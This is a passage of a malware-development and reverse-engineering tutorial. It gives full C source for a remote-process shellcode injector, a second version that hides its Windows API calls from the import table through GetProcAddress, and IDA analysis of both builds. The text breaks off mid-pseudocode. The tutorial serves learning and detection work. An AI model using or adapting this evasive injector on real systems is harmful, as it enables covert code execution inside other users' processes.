Malware Development and Reverse Engineering Analysis Part 1

Shellcode Remote Process Injection, API Obfuscation, and API XOR String Encryption

This writeup is part of a series where I plan to share what I’ve learned about malware development and red team tooling development. Each writeup will offer a guide and in-depth technical insights into the malware or program I’m working on. Along with that, I’ll include a simple reverse engineering analysis to show what it looks like in a disassembler. The goal is to sharpen my skills in both malware development and malware analysis/reverse engineering through this process.

This post first shows the steps in writing a simple malware program that injects shellcode into a remote target process identified by a supplied PID. It then goes over how we can hide suspicious Windows API calls from the Import Address Table (IAT) to avoid basic analysis. Finally, it covers how to XOR encrypt certain strings and how that obscures what the program does under basic static analysis.

All project files (code and scripts) can be found here: https://github.com/0xEct0/Maldev-Re-1

NOTE: The following snippets of code throughout this writeup have a lot of Windows APIs. I will not go in depth on what each argument/return value is, so please refer to the API’s respective Microsoft documentation page for more detailed technical information.

Writing a Simple Shellcode Injection Program - no-obfuscation.c

At a high level, the execution flow of no-obfuscation.c is:

  1. Accept via arguments PID of target process
  2. Validate there’s a running process that matches the PID supplied
  3. Open handle to target process
  4. Allocate memory in target process
  5. Write shellcode in the allocated memory within the target process
  6. Change permissions to have the region of memory executable
  7. Execute the shellcode in the region of allocated memory

The first step is pretty straightforward: we’ll take the second argument (the first argument is the program name) and convert it to an integer:

int main( int argc, char *argv[] )
{
    if( argc < 2 )
    {
        return 1; // no PID supplied
    }
    
    DWORD process_id = atoi( argv[1] );
}
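One caveat with atoi is that it cannot report errors: non-numeric input such as "abc" silently becomes 0. A minimal sketch of a stricter parser is shown below, assuming we only want plain decimal PIDs that fit in 32 bits. The helper name parse_pid is hypothetical and is not part of the original project.

```c
#include <errno.h>
#include <stdlib.h>

/*
 * Hypothetical helper (not in the original project): parse a decimal PID
 * from a command-line argument. Returns 1 on success and stores the value
 * in *pid_out; returns 0 for empty, non-numeric, or out-of-range input.
 */
int parse_pid( const char *text, unsigned long *pid_out )
{
    char *end = NULL;
    unsigned long value;

    if( NULL == text || NULL == pid_out )
    {
        return 0;
    }

    /* Accept only strings that start with a decimal digit (no sign, no spaces) */
    if( text[0] < '0' || text[0] > '9' )
    {
        return 0;
    }

    errno = 0;
    value = strtoul( text, &end, 10 );

    /* Reject overflow, trailing characters, and values that do not fit in 32 bits */
    if( 0 != errno || '\0' != *end || value > 0xFFFFFFFFUL )
    {
        return 0;
    }

    *pid_out = value;
    return 1;
}
```

With a helper like this, main could return early when parse_pid( argv[1], &pid ) returns 0 instead of continuing with a PID of 0.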

Now to validate that there’s a running process with that PID, we’ll use the following Windows APIs:

  • CreateToolhelp32Snapshot - Gets a snapshot of all running processes
  • Process32First - Gets information of the first process in the snapshot from CreateToolhelp32Snapshot
  • Process32Next - Gets information of the next process in the snapshot from CreateToolhelp32Snapshot
  • OpenProcess - Once PID is verified, this API will get a handle to the process

Each entry in the snapshot is described by a PROCESSENTRY32 struct. From the Microsoft docs:

typedef struct tagPROCESSENTRY32 {
  DWORD     dwSize;
  DWORD     cntUsage;
  DWORD     th32ProcessID;
  ULONG_PTR th32DefaultHeapID;
  DWORD     th32ModuleID;
  DWORD     cntThreads;
  DWORD     th32ParentProcessID;
  LONG      pcPriClassBase;
  DWORD     dwFlags;
  CHAR      szExeFile[MAX_PATH];
} PROCESSENTRY32;

The field we’re interested in is the th32ProcessID which holds the PID of the process.

To enumerate the running processes, we first call CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 ). TH32CS_SNAPPROCESS means the snapshot will include all running processes on the system. The second argument doesn’t matter here; per the Microsoft docs for this API: “The process identifier of the process to be included in the snapshot. This parameter can be zero to indicate the current process. This parameter is used when the TH32CS_SNAPHEAPLIST, TH32CS_SNAPMODULE, TH32CS_SNAPMODULE32, or TH32CS_SNAPALL value is specified. Otherwise, it is ignored and all processes are included in the snapshot.”

Once a snapshot has been successfully created, we’ll look at the first process using Process32First and enter a do-while loop to check the process ID. If it does not match the PID supplied to the program, the loop moves to the next process in the snapshot using Process32Next. If the process ID matches, the program obtains a handle to the target using the OpenProcess API and breaks out of the loop. Below is the code for that:

    HANDLE process_snapshot;
    HANDLE target_process = NULL;
    PROCESSENTRY32 current_process;
    
    //
    // ENUMERATE RUNNING PROCESSES TO ENSURE PID IS VALID
    //
    process_snapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );

    if( INVALID_HANDLE_VALUE == process_snapshot ) // this API returns INVALID_HANDLE_VALUE on failure, not NULL
    {
        return 1;
    }

    current_process.dwSize = sizeof( PROCESSENTRY32 );
    Process32First( process_snapshot, &current_process );

    do
    {   
        // printf( "process id = %d\n", current_process.th32ProcessID );
        if( process_id == current_process.th32ProcessID )
        {
            target_process = OpenProcess( PROCESS_ALL_ACCESS, TRUE, current_process.th32ProcessID );
            break;
        }
    }

    while( Process32Next(process_snapshot, &current_process) );

    CloseHandle( process_snapshot );

    if( NULL == target_process )
    {
        // printf( "[!] Could not find target or OpenProcess() failed!\n" );
        return 1;
    }

Once the PID has been validated against a running process and a handle to the process has been obtained, the next step is to allocate memory in the target process using the VirtualAllocEx API. We’ll allocate as many bytes as the payload occupies and give the region read and write permissions; a later step will modify this region of memory to allow execution. The API returns a pointer to where the memory was allocated in the target process. Read the Microsoft docs for specific information about this function. Below is the code for allocating memory in the target process.

    size_t payload_size = sizeof( payload );
    LPVOID target_process_allocated_memory = NULL;
    
    target_process_allocated_memory = VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );

    if( NULL == target_process_allocated_memory )
    {
        // printf( "[!] Could not allocate memory!\n" );
        return 1;
    }

The next step is to write our payload into the target process, at the address of the memory we allocated in the previous step:

    //
    // WRITE TO ALLOCATED MEMORY
    //
    BOOL return_check = FALSE;

    return_check = WriteProcessMemory( target_process, target_process_allocated_memory, payload, payload_size, NULL );

    if( FALSE == return_check )
    {
        // printf( "[+] WriteProcessMemory returned false!\n" );
        return 1;
    }

Next, we update the allocated region where we wrote the payload to allow execution, using the VirtualProtectEx Windows API. We’ll set the protection to PAGE_EXECUTE_READWRITE. Note that this API requires a valid pointer for its last argument (old_protect in the code below). From the API docs: “[out] lpflOldProtect - A pointer to a variable that receives the previous access protection of the first page in the specified region of pages. If this parameter is NULL or does not point to a valid variable, the function fails.” Below is the code for it.

    //
    // UPDATE PERMISSIONS TO ALLOW EXECUTION
    //
    DWORD old_protect = 0;
    return_check = VirtualProtectEx( target_process, target_process_allocated_memory, payload_size, PAGE_EXECUTE_READWRITE, &old_protect );

    if( FALSE == return_check )
    {
        // printf( "[!] VirtualProtectEx() returned false! Error code: %d\n", GetLastError() );
        return 1;
    }

Last, we’ll execute the shellcode that was injected by using the CreateRemoteThread WinAPI:

    //
    // EXECUTE SHELLCODE IN ALLOCATED MEMORY
    //
    HANDLE handle_remote_thread = NULL;

    handle_remote_thread = CreateRemoteThread( target_process, NULL, 0, target_process_allocated_memory, NULL, 0, NULL );

    if( NULL == handle_remote_thread )
    {
        // printf( "[!] CreateRemoteThread() failed!\n" );
        return 1;
    }

    // printf( "[+] Executed payload!\n" );
    return 0;

Compilation was done using Microsoft Visual Studio cl.exe compiler: cl.exe no-obfuscation.c /Fe:no-obfuscation.exe

Static Analysis of no-obfuscation.exe

For the reverse engineering analysis, I will be using IDA freeware. To start off, we can look at the Import Address Table (IAT). This Microsoft dev blog (https://devblogs.microsoft.com/oldnewthing/20221006-07/?p=107257) describes the IAT as follows:

The import address table is the part of the Windows module (executable or dynamic link library) which records the addresses of functions imported from other DLLs. For example, if your program calls GetSystemInfo(), then the executable or DLL will have an entry in its import table that says, “I would like to be able to call the function GetSystemInfo() from kernel32.dll.” When the module is loaded, the system goes and finds that function, obtains its address, and stores it in a table known as the Import Address Table (IAT).

Essentially, we can look at the IAT to see which APIs are imported and used within the executable. This can give us an idea of what the executable will do. In IDA freeware, the IAT can be viewed under View > Open subviews > Imports.

[Image: Imports view in IDA for no-obfuscation.exe]

Right away, we can see some suspicious Windows APIs that are used which should be familiar to us. Grouping by functionality, the CreateToolhelp32Snapshot, Process32First, and Process32Next APIs are used to enumerate through the running processes on the system while the OpenProcess, VirtualAllocEx, VirtualProtectEx, WriteProcessMemory, and CreateRemoteThread are used for process injection/memory injection techniques.

In addition, we can have IDA generate pseudocode to make analysis easier by doing View > Open subviews > Generate pseudocode. Here is the resulting pseudocode:

int __fastcall main(int argc, const char **argv, const char **envp)
{
  HANDLE hProcess; // [rsp+48h] [rbp-180h]
  void *lpBaseAddress; // [rsp+50h] [rbp-178h]
  HANDLE hSnapshot; // [rsp+58h] [rbp-170h]
  int v7; // [rsp+60h] [rbp-168h]
  DWORD flOldProtect; // [rsp+64h] [rbp-164h] BYREF
  SIZE_T dwSize; // [rsp+68h] [rbp-160h]
  __int64 v10; // [rsp+70h] [rbp-158h]
  PROCESSENTRY32 pe; // [rsp+80h] [rbp-148h] BYREF

  if ( argc < 2 )
    return 0;
  hProcess = 0LL;
  v7 = unknown_libname_19(argv[1], argv, envp);
  hSnapshot = CreateToolhelp32Snapshot(2u, 0);
  if ( !hSnapshot )
    return 1;
  pe.dwSize = 304;
  Process32First(hSnapshot, &pe);
  while ( v7 != pe.th32ProcessID )
  {
    if ( !Process32Next(hSnapshot, &pe) )
      goto LABEL_8;
  }
  hProcess = OpenProcess(0x1FFFFFu, 1, pe.th32ProcessID);
LABEL_8:
  CloseHandle(hSnapshot);
  if ( !hProcess )
    return 1;
  dwSize = 3072LL;
  lpBaseAddress = VirtualAllocEx(hProcess, 0LL, 0xC00uLL, 0x3000u, 4u);
  if ( !lpBaseAddress )
    return 1;
  if ( !WriteProcessMemory(hProcess, lpBaseAddress, &unk_14001C000, dwSize, 0LL) )
    return 1;
  flOldProtect = 0;
  if ( !VirtualProtectEx(hProcess, lpBaseAddress, dwSize, 0x40u, &flOldProtect) )
    return 1;
  v10 = 0LL;
  return CreateRemoteThread(hProcess, 0LL, 0LL, (LPTHREAD_START_ROUTINE)lpBaseAddress, 0LL, 0, 0LL) == 0LL;
}

Here we can see IDA was pretty close to the source code, where we first check to ensure the user supplied an argument (a PID), then it enumerates through the processes using the aforementioned Windows APIs, gets a handle to the process using OpenProcess, then uses several Windows APIs to inject the shellcode into the target process.
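The pseudocode shows raw numbers where the source used named constants, so part of reading it is mapping values such as 0x3000, 4, and 0x40 back to their names. Below is a small analyst-side sketch of that lookup. The numeric values are the ones documented for VirtualAllocEx and VirtualProtectEx, while the helper names (page_protection_name, allocation_type_names) are hypothetical and only cover the handful of flags relevant here.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

struct flag_name
{
    unsigned int value;
    const char  *name;
};

/* Page protection constants as documented for VirtualAllocEx/VirtualProtectEx */
static const struct flag_name page_protections[] =
{
    { 0x01, "PAGE_NOACCESS" },
    { 0x02, "PAGE_READONLY" },
    { 0x04, "PAGE_READWRITE" },
    { 0x10, "PAGE_EXECUTE" },
    { 0x20, "PAGE_EXECUTE_READ" },
    { 0x40, "PAGE_EXECUTE_READWRITE" },
};

/* Allocation type bits as documented for VirtualAllocEx (subset) */
static const struct flag_name allocation_types[] =
{
    { 0x1000, "MEM_COMMIT" },
    { 0x2000, "MEM_RESERVE" },
};

/* Returns the name of a single page protection value, or "UNKNOWN" */
const char *page_protection_name( unsigned int value )
{
    for( size_t i = 0; i < sizeof(page_protections) / sizeof(page_protections[0]); i++ )
    {
        if( page_protections[i].value == value )
        {
            return page_protections[i].name;
        }
    }
    return "UNKNOWN";
}

/* Writes the names of all known bits set in flags, joined by " | ", into out */
void allocation_type_names( unsigned int flags, char *out, size_t out_size )
{
    if( NULL == out || 0 == out_size )
    {
        return;
    }

    out[0] = '\0';

    for( size_t i = 0; i < sizeof(allocation_types) / sizeof(allocation_types[0]); i++ )
    {
        if( flags & allocation_types[i].value )
        {
            size_t used = strlen( out );
            snprintf( out + used, out_size - used, "%s%s", used ? " | " : "", allocation_types[i].name );
        }
    }
}
```

For the pseudocode above, allocation_type_names( 0x3000, ... ) produces "MEM_COMMIT | MEM_RESERVE", page_protection_name( 4 ) gives "PAGE_READWRITE", and page_protection_name( 0x40 ) gives "PAGE_EXECUTE_READWRITE", which matches the source. In the same way, the 0x1FFFFF passed to OpenProcess is PROCESS_ALL_ACCESS and the 2 passed to CreateToolhelp32Snapshot is TH32CS_SNAPPROCESS.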

As shown, identifying which Windows APIs were used in this program was very straightforward. Either the IAT or the pseudocode generated by IDA was enough to identify which APIs were used, and thus what the program is meant to do.

Obfuscating Windows APIs - obfuscated-apis.c

To provide a simple layer of obfuscation, we can utilize two APIs to dynamically load and call other Windows APIs: LoadLibraryA and GetProcAddress. The first obtains a handle to a DLL while the latter gets the address of a function within a DLL. Using these two functions, we can declare a function pointer that matches the signature of a specific WinAPI function that we want to use, and then assign the address of that WinAPI function to the pointer for later use. Consider the example below using MessageBoxA:

    char string1[] = "Hello, World!";
    char string2[] = "Test MessageBox()";
    
    MessageBoxA(NULL, string1, string2, MB_OK );

    return 0;

Looking at the IAT, you can see MessageBoxA listed. However, the code snippet below shows how we can dynamically load and call the same API:

    char string1[] = "Hello, World!";
    char string2[] = "Test MessageBox()";

    HMODULE user32_handle = LoadLibraryA( "USER32.DLL" );
    
    if( NULL == user32_handle )
    {
        DWORD dwError = GetLastError();
        return 1;
    }

    // MessageBoxA takes ANSI strings, so the string parameters are LPCSTR
    int (WINAPI * _MessageBox)
    (
        HWND   hWnd,
        LPCSTR lpText,
        LPCSTR lpCaption,
        UINT   uType    
    );

    _MessageBox = ( int (WINAPI *)
    (
        HWND   hWnd,
        LPCSTR lpText,
        LPCSTR lpCaption,
        UINT   uType    
    )) GetProcAddress( user32_handle, "MessageBoxA");
    
    if( NULL == _MessageBox)
    {
        printf( "Could not initialize _MessageBox!\n" );
        return 1;
    }

    _MessageBox(NULL, string1, string2, MB_OK );

    return 0;

We first load the DLL using LoadLibraryA; in this instance we load user32.dll since that’s where the API we want resides. We then check that it was loaded properly, declare a function pointer with the same signature as MessageBoxA, and name it _MessageBox. Next, we set the pointer to the address of the MessageBoxA function using GetProcAddress. Finally, we check that the function was resolved successfully so that it is ready to be used. Looking at the IAT of the resulting exe in IDA, MessageBoxA is no longer listed. We can apply this same methodology to the original process injection code.
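The declare-then-cast pattern above writes the full signature twice. A typedef lets us state it once. The portable sketch below illustrates the same "resolve by name, check for NULL, then call" flow using a mock lookup table in place of a real module, so it compiles without Windows headers. Every name in it (binary_op_fn, mock_exports, mock_resolve) is hypothetical and exists only for illustration.

```c
#include <stddef.h>
#include <string.h>

/* One typedef states the signature once instead of repeating it in a cast */
typedef int ( *binary_op_fn )( int a, int b );

static int add_op( int a, int b ) { return a + b; }
static int mul_op( int a, int b ) { return a * b; }

/* Hypothetical name-to-address table standing in for a module's exports */
struct mock_export
{
    const char  *name;
    binary_op_fn address;
};

static const struct mock_export mock_exports[] =
{
    { "add", add_op },
    { "mul", mul_op },
};

/* Look a function up by name; returns NULL when the name is unknown */
binary_op_fn mock_resolve( const char *name )
{
    for( size_t i = 0; i < sizeof(mock_exports) / sizeof(mock_exports[0]); i++ )
    {
        if( 0 == strcmp( mock_exports[i].name, name ) )
        {
            return mock_exports[i].address;
        }
    }
    return NULL;
}
```

A caller stores the result of mock_resolve( "mul" ) in a binary_op_fn variable, checks it against NULL, and then calls it like a normal function. With the Windows headers available, the same idea would look like typedef int (WINAPI *MessageBoxA_fn)( HWND, LPCSTR, LPCSTR, UINT ); followed by a single cast of the GetProcAddress result to MessageBoxA_fn (a type name chosen here for illustration).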

For the process injection code, we’ll hide the main API functions that pretty much give away what the code does:

  • CreateToolhelp32Snapshot
  • Process32First
  • Process32Next
  • VirtualAllocEx
  • VirtualProtectEx
  • OpenProcess
  • WriteProcessMemory
  • CreateRemoteThread

All of these functions are exported by kernel32.dll, so we only need to obtain a handle to that one module:

    HMODULE kernel32_dll_handle = LoadLibraryA( "KERNEL32.DLL" );
    
    if( NULL == kernel32_dll_handle )
    {
        return 1;
    }

Now, with a handle to the kernel32 module, we can use GetProcAddress to dynamically resolve function pointers whose signatures match the WinAPI functions we want to use. The following example resolves CreateToolhelp32Snapshot:

    HANDLE( WINAPI * _CreateToolhelp32Snapshot )
    (
        DWORD dwFlags,
        DWORD th32ProcessID        
    );

    _CreateToolhelp32Snapshot = (HANDLE (WINAPI *)
    (
        DWORD dwFlags,
        DWORD th32ProcessID     
    )) GetProcAddress( kernel32_dll_handle, "CreateToolhelp32Snapshot" );

Then, to use _CreateToolhelp32Snapshot, we call it exactly as we would the original API:

    // check to ensure it's been resolved
    if( NULL == _CreateToolhelp32Snapshot )
    {
        return 1;
    }

    process_snapshot = _CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );

Another example with VirtualAllocEx:

    LPVOID( WINAPI * _VirtualAllocEx )
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flAllocationType,
        DWORD  flProtect    
    );

    _VirtualAllocEx = ( LPVOID( WINAPI *) 
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flAllocationType,
        DWORD  flProtect    
    )) GetProcAddress( kernel32_dll_handle, "VirtualAllocEx" );

    if( NULL == _VirtualAllocEx )
    {
        // printf( "Could not resolve VirtualAllocEx!\n" );
        return 1;
    }

    target_process_allocated_memory = _VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );

We can repeat this process of resolving APIs to hide them from the IAT. Here is the final code for this version:

#include <stdio.h>
#include <stdlib.h>   // atoi
#include <windows.h>
#include <TlHelp32.h>
#include "payload.h"

int main( int argc, char* argv[] )
{
    if( argc < 2 )
    {
        return 1;
    }

    HANDLE process_snapshot;
    HANDLE target_process = NULL;
    PROCESSENTRY32 current_process;
    DWORD process_id = atoi( argv[1] );

    //
    // ENUMERATE RUNNING PROCESSES TO ENSURE PID IS VALID
    //
    HMODULE kernel32_dll_handle = LoadLibraryA( "KERNEL32.DLL" );
    
    if( NULL == kernel32_dll_handle )
    {
        // printf( "Could not load kernel32.dll!\n" );
        return 1;
    }
    
    HANDLE( WINAPI * _CreateToolhelp32Snapshot )
    (
        DWORD dwFlags,
        DWORD th32ProcessID        
    );

    _CreateToolhelp32Snapshot = (HANDLE (WINAPI *)
    (
        DWORD dwFlags,
        DWORD th32ProcessID     
    )) GetProcAddress( kernel32_dll_handle, "CreateToolhelp32Snapshot" );

    if( NULL == _CreateToolhelp32Snapshot )
    {
        // printf( "Could not resolve CreateToolhelp32Snapshot!\n" );
        return 1;
    }

    process_snapshot = _CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );

    if( INVALID_HANDLE_VALUE == process_snapshot ) // this API returns INVALID_HANDLE_VALUE on failure, not NULL
    {
        return 1;
    }

    current_process.dwSize = sizeof( PROCESSENTRY32 );
    
    BOOL( WINAPI * _Process32First)
    (
        HANDLE           hSnapshot,
        LPPROCESSENTRY32 lppe   
    );

    _Process32First = ( BOOL (WINAPI *)
    (
        HANDLE           hSnapshot,
        LPPROCESSENTRY32 lppe     
    )) GetProcAddress( kernel32_dll_handle, "Process32First" );

    if( NULL == _Process32First )
    {
        // printf( "Could not resolve Process32First!\n" );
        return 1;
    }
    
    _Process32First( process_snapshot, &current_process );

    BOOL( WINAPI * _Process32Next)
    (
        HANDLE           hSnapshot,
        LPPROCESSENTRY32 lppe 
    );

    _Process32Next = ( BOOL (WINAPI *)
    (
        HANDLE           hSnapshot,
        LPPROCESSENTRY32 lppe    
    )) GetProcAddress( kernel32_dll_handle, "Process32Next" );

    if( NULL == _Process32Next )
    {
        // printf( "Could not resolve Process32Next!\n" );
        return 1;
    }

    do
    {   
        // printf( "process id = %d\n", current_process.th32ProcessID );
        if( process_id == current_process.th32ProcessID )
        {
            HANDLE( WINAPI * _OpenProcess )
            (
                DWORD dwDesiredAccess,
                BOOL  bInheritHandle,
                DWORD dwProcessId            
            );

            _OpenProcess = ( HANDLE (WINAPI *)
            (
                DWORD dwDesiredAccess,
                BOOL  bInheritHandle,
                DWORD dwProcessId             
            )) GetProcAddress( kernel32_dll_handle, "OpenProcess" );

            if( NULL == _OpenProcess )
            {
                // printf( "Could not resolve OpenProcess!\n" );
                return 1;
            }

            target_process = _OpenProcess( PROCESS_ALL_ACCESS, TRUE, current_process.th32ProcessID );
            break;
        }
    }

    while( _Process32Next(process_snapshot, &current_process) );

    CloseHandle( process_snapshot );

    if( NULL == target_process )
    {
        return 1;
    }

    //
    // ALLOCATE MEMORY IN TARGET PROCESS
    //
    size_t payload_size = sizeof( payload );
    LPVOID target_process_allocated_memory = NULL;
    
    LPVOID( WINAPI * _VirtualAllocEx )
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flAllocationType,
        DWORD  flProtect    
    );

    _VirtualAllocEx = ( LPVOID( WINAPI *) 
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flAllocationType,
        DWORD  flProtect    
    )) GetProcAddress( kernel32_dll_handle, "VirtualAllocEx" );

    if( NULL == _VirtualAllocEx )
    {
        // printf( "Could not resolve VirtualAllocEx!\n" );
        return 1;
    }

    target_process_allocated_memory = _VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );

    if( NULL == target_process_allocated_memory )
    {
        // printf( "[!] Could not allocate memory!\n" );
        return 1;
    }

    // printf( "[+] Successfully allocated memory!\n" );

    //
    // WRITE TO ALLOCATED MEMORY
    //
    BOOL return_check = FALSE;

    BOOL( WINAPI * _WriteProcessMemory )
    (
        HANDLE  hProcess,
        LPVOID  lpBaseAddress,
        LPCVOID lpBuffer,
        SIZE_T  nSize,
        SIZE_T  *lpNumberOfBytesWritten    
    );

    _WriteProcessMemory = ( BOOL(WINAPI *)
    (
        HANDLE  hProcess,
        LPVOID  lpBaseAddress,
        LPCVOID lpBuffer,
        SIZE_T  nSize,
        SIZE_T  *lpNumberOfBytesWritten     
    )) GetProcAddress( kernel32_dll_handle, "WriteProcessMemory" );

    if( NULL == _WriteProcessMemory )
    {
        // printf( "Could not resolve WriteProcessMemory!\n" );
        return 1;
    }

    return_check = _WriteProcessMemory( target_process, target_process_allocated_memory, payload, payload_size, NULL );

    if( FALSE == return_check )
    {
        // printf( "[+] WriteProcessMemory returned false!\n" );
        return 1;
    }

    //
    // UPDATE PERMISSIONS TO ALLOW EXECUTION
    //
    DWORD old_protect = 0;

    BOOL( WINAPI * _VirtualProtectEx )
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flNewProtect,
        PDWORD lpflOldProtect
    );

    _VirtualProtectEx = ( BOOL(WINAPI *)
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flNewProtect,
        PDWORD lpflOldProtect   
    )) GetProcAddress( kernel32_dll_handle, "VirtualProtectEx" );

    if( NULL == _VirtualProtectEx )
    {
        // printf( "Could not resolve VirtualProtectEx!\n" );
        return 1;
    }

    return_check = _VirtualProtectEx( target_process, target_process_allocated_memory, payload_size, PAGE_EXECUTE_READWRITE, &old_protect );

    if( FALSE == return_check )
    {
        // printf( "[!] VirtualProtectEx() returned false! Error code: %d\n", GetLastError() );
        return 1;
    }

    //
    // EXECUTE SHELLCODE IN ALLOCATED MEMORY
    //
    HANDLE handle_remote_thread = NULL;

    HANDLE( WINAPI * _CreateRemoteThread )
    (
        HANDLE                 hProcess,
        LPSECURITY_ATTRIBUTES  lpThreadAttributes,
        SIZE_T                 dwStackSize,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID                 lpParameter,
        DWORD                  dwCreationFlags,
        LPDWORD                lpThreadId   
    );

    _CreateRemoteThread = ( HANDLE(WINAPI *)
    (
        HANDLE                 hProcess,
        LPSECURITY_ATTRIBUTES  lpThreadAttributes,
        SIZE_T                 dwStackSize,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID                 lpParameter,
        DWORD                  dwCreationFlags,
        LPDWORD                lpThreadId    
    )) GetProcAddress( kernel32_dll_handle, "CreateRemoteThread" );

    if( NULL == _CreateRemoteThread )
    {
        // printf( "Could not resolve CreateRemoteThread!\n" );
        return 1;
    }

    handle_remote_thread = _CreateRemoteThread( target_process, NULL, 0, target_process_allocated_memory, NULL, 0, NULL );

    if( NULL == handle_remote_thread )
    {
        // printf( "[!] CreateRemoteThread() failed!\n" );
        return 1;
    }    

    return 0;
}

Static Analysis of obfuscated-apis.exe

Opening this version of the process injection executable and looking at the IAT, the APIs that we dynamically resolved no longer appear.

[Image: Imports view in IDA for obfuscated-apis.exe]

However, we can now see the two APIs that were used to hide them: GetProcAddress and LoadLibraryA. We could go further and hide these two APIs as well by walking the PEB and calculating the absolute addresses of these functions, but that is out of scope for this article. That process is outlined in the post on my blog about shellcoding a reverse shell in C.

Furthermore, the pseudocode that’s generated by IDA looks similar where we can see the allocation/resolving of WinAPI functions and calling them:

int __fastcall main(int argc, const char **argv, const char **envp)
{
  HMODULE hModule; // [rsp+48h] [rbp-1C0h]
  __int64 v5; // [rsp+50h] [rbp-1B8h]
  __int64 v6; // [rsp+58h] [rbp-1B0h]
  HANDLE hObject; // [rsp+60h] [rbp-1A8h]
  int v8; // [rsp+68h] [rbp-1A0h]
  int v9; // [rsp+6Ch] [rbp-19Ch] BYREF
  __int64 v10; // [rsp+70h] [rbp-198h]
  HANDLE (__stdcall *CreateToolhelp32Snapshot)(DWORD, DWORD); // [rsp+78h] [rbp-190h]
  BOOL (__stdcall *Process32First)(HANDLE, LPPROCESSENTRY32); // [rsp+80h] [rbp-188h]
  HANDLE (__stdcall *OpenProcess)(DWORD, BOOL, DWORD); // [rsp+88h] [rbp-180h]
  BOOL (__stdcall *Process32Next)(HANDLE, LPPROCESSENTRY32); // [rsp+90h] [rbp-178h]
  LPVOID (__stdcall *VirtualAllocEx)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD); // [rsp+98h] [rbp-170h]
  BOOL (__stdcall *WriteProcessMemory)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T *); // [rsp+A0h] [rbp-168h]
  BOOL (__stdcall *VirtualProtectEx)(HANDLE, LPVOID, SIZE_T, DWORD, PDWORD); // [rsp+A8h] [rbp-160h]
  HANDLE (__stdcall *CreateRemoteThread)(HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); // [rsp+B0h] [rbp-158h]
  __int64 v19; // [rsp+B8h] [rbp-150h]
  int v20; // [rsp+C0h] [rbp-148h] BYREF
  unsigned int v21; // [rsp+C8h] [rbp-140h]

  if ( argc < 2 )
    return 1;
  v5 = 0LL;
  v8 = unknown_libname_19(argv[1], argv, envp);
  hModule = LoadLibraryA(LibFileName);
  if ( !hModule )
    return 1;
  CreateToolhelp32Snapshot = (HANDLE (__stdcall *)(DWORD, DWORD))GetProcAddress(hModule, ProcName);
  if ( !CreateToolhelp32Snapshot )
    return 1;
  hObject = (HANDLE)((__int64 (__fastcall *)(__int64, _QWORD))CreateToolhelp32Snapshot)(2LL, 0LL);
  if ( !hObject )
    return 1;
  v20 = 304;
  Process32First = (BOOL (__stdcall *)(HANDLE, LPPROCESSENTRY32))GetProcAddress(hModule, aProcess32first);
  if ( !Process32First )
    return 1;
  ((void (__fastcall *)(HANDLE, int *))Process32First)(hObject, &v20);
  Process32Next = (BOOL (__stdcall *)(HANDLE, LPPROCESSENTRY32))GetProcAddress(hModule, aProcess32next);
  if ( !Process32Next )
    return 1;
  while ( v8 != v21 )
  {
    if ( !((unsigned int (__fastcall *)(HANDLE, int *))Process32Next)(hObject, &v20) )
      goto LABEL_18;
  }
  OpenProcess = (HANDLE (__stdcall *)(DWORD, BOOL, DWORD))GetProcAddress(hModule, aOpenprocess);
  if ( !OpenProcess )
    return 1;
  v5 = ((__int64 (__fastcall *)(__int64, __int64, _QWORD))OpenProcess)(0x1FFFFFLL, 1LL, v21);
LABEL_18:
  CloseHandle(hObject);
  if ( !v5 )
    return 1;
  v10 = 3072LL;
  VirtualAllocEx = (LPVOID (__stdcall *)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD))GetProcAddress(hModule, aVirtualallocex);
  if ( !VirtualAllocEx )
    return 1;
  v6 = ((__int64 (__fastcall *)(__int64, _QWORD, __int64, __int64, int))VirtualAllocEx)(v5, 0LL, v10, 12288LL, 4);
  if ( !v6 )
    return 1;
  WriteProcessMemory = (BOOL (__stdcall *)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T *))GetProcAddress(
                                                                                        hModule,
                                                                                        aWriteprocessme);
  if ( !WriteProcessMemory )
    return 1;
  if ( !((unsigned int (__fastcall *)(__int64, __int64, void *, __int64, _QWORD))WriteProcessMemory)(
          v5,
          v6,
          &unk_14001C000,
          v10,
          0LL) )
    return 1;
  v9 = 0;
  VirtualProtectEx = (BOOL (__stdcall *)(HANDLE, LPVOID, SIZE_T, DWORD, PDWORD))GetProcAddress(hModule, aVirtualprotect);
  if ( !VirtualProtectEx )
    return 0;
  if ( !((unsigned int (__fastcall *)(__int64, __int64, __int64, __int64, int *))VirtualProtectEx)(
          v5,
          v6,
          v10,
          64LL,
          &v9) )
    return 1;
  v19 = 0LL;
  CreateRemoteThread = (HANDLE (__stdcall *)(HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD))GetProcAddress(hModule, aCreateremoteth);
  if ( !CreateRemoteThread )
    return 1;
  v19 = ((__int64 (__fastcall *)(__int64, _QWORD, _QWORD, __int64, _QWORD, _DWORD, _QWORD))CreateRemoteThread)(
          v5,
          0LL,
          0LL,
          v6,
          0LL,
          0,
